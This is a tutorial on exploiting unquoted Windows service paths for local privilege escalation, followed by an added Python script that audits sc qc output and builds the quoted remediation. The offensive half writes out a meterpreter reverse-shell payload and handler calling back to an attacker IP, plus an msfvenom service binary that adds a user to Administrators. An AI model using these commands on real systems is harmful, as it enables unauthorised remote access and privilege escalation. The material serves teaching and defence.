# Unquoted Service Paths & Windows Local Privilege Escalation

I recorded a demo video.

## Start a meterpreter listener

```shell
# Inside msfconsole: start a handler for the reverse_tcp payload (attacker host 192.168.1.100, port 4444)
msfconsole
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

# From a normal shell: build the payload that connects back to that handler
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

# Back in msfconsole, once a meterpreter session exists: find the trusted service path module and run it against session 1
search trusted_service
use 0
set session 1
run
```

## Check service permissions

```cmd
:: Show who has write access to the unquotedsvc service object (-c service, -w write access, -u suppress errors, -v verbose)
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc unquotedsvc
:: List every service that the account "user" has write access to (-q omits the banner)
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv user *
:: Show the service configuration, including its BINARY_PATH_NAME
sc qc unquotedsvc
```

## Generate a forged service binary

```cmd
:: Build a service executable whose only action is adding "user" to the local Administrators group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
:: Start the service, then check the Administrators group membership
sc start unquotedsvc
net localgroup administrators
```
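The `sc qc` step above only shows the BINARY_PATH_NAME; deciding whether a service is exposed still has to be done by eye. As an added example (not from the original post), the following audit script performs that decision: it parses `sc qc` output, flags a path that is unquoted and contains spaces, lists the directories whose ACLs a defender must confirm are not writable by unprivileged users, and builds the quoted value that remediates the finding. The `sc qc` output, service names and paths below are constructed samples.

```python
"""Audit helper for unquoted service paths (added example, not from the original post)."""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed `sc qc` output for three hypothetical services (not real hosts).
SC_QC_SAMPLES = [
    r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        SERVICE_START_NAME : LocalSystem
""",
    r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: quotedsvc
        BINARY_PATH_NAME   : "C:\Program Files\Quoted Svc\svc.exe" -k Service
        SERVICE_START_NAME : LocalSystem
""",
    r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: nospacesvc
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        SERVICE_START_NAME : LocalSystem
""",
]


@dataclass
class ServiceCheck:
    name: str
    image_path: str
    exe_path: str
    vulnerable: bool
    fixed_image_path: str          # quoted value to set via `sc config <name> binPath= ...`
    dirs_to_verify: list = field(default_factory=list)  # directories whose ACLs must be checked


def parse_sc_qc(text):
    """Return (service_name, binary_path_name) from one `sc qc` output block."""
    name = re.search(r"^SERVICE_NAME:\s*(\S+)", text, re.M)
    path = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", text, re.M)
    if not name or not path:
        raise ValueError("input does not look like `sc qc` output")
    return name.group(1), path.group(1)


def split_image_path(image_path):
    """Split an ImagePath into (executable, arguments, was_quoted)."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:  # unterminated quote: treat the remainder as the executable
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    # Unquoted: the executable runs up to the first ".exe"; the rest is arguments.
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", s, re.I)
    if m:
        return m.group(1), m.group(2) or "", False
    head, _, tail = s.partition(" ")  # no .exe extension: first token is the executable
    return head, tail.strip(), False


def directories_to_verify(exe_path):
    """For an unquoted path with spaces, every prefix ending before a space names a
    candidate binary; the directory holding each candidate must not be writable."""
    dirs = []
    for i, ch in enumerate(exe_path):
        if ch == " ":
            d = ntpath.dirname(exe_path[:i])
            if d and d not in dirs:
                dirs.append(d)
    return dirs


def audit_service(sc_qc_text):
    """Run the unquoted-path check on one `sc qc` output block."""
    name, image_path = parse_sc_qc(sc_qc_text)
    exe, args, quoted = split_image_path(image_path)
    vulnerable = (not quoted) and (" " in exe)
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return ServiceCheck(name, image_path, exe, vulnerable, fixed,
                        directories_to_verify(exe) if vulnerable else [])


def audit_all(blocks):
    return [audit_service(b) for b in blocks]


if __name__ == "__main__":
    for c in audit_all(SC_QC_SAMPLES):
        print(f"{c.name:12} {'VULNERABLE' if c.vulnerable else 'ok':10} {c.image_path}")
        if c.vulnerable:
            print(f"    set binPath to: {c.fixed_image_path}")
            print(f"    verify ACLs on: {c.dirs_to_verify}")
```

On a live host the same BINARY_PATH_NAME values come from `sc qc <service>` (or the service's ImagePath registry value); the remediation is to write the quoted value back with `sc config <service> binPath= ...` and to confirm that none of the listed directories grants write access to unprivileged accounts.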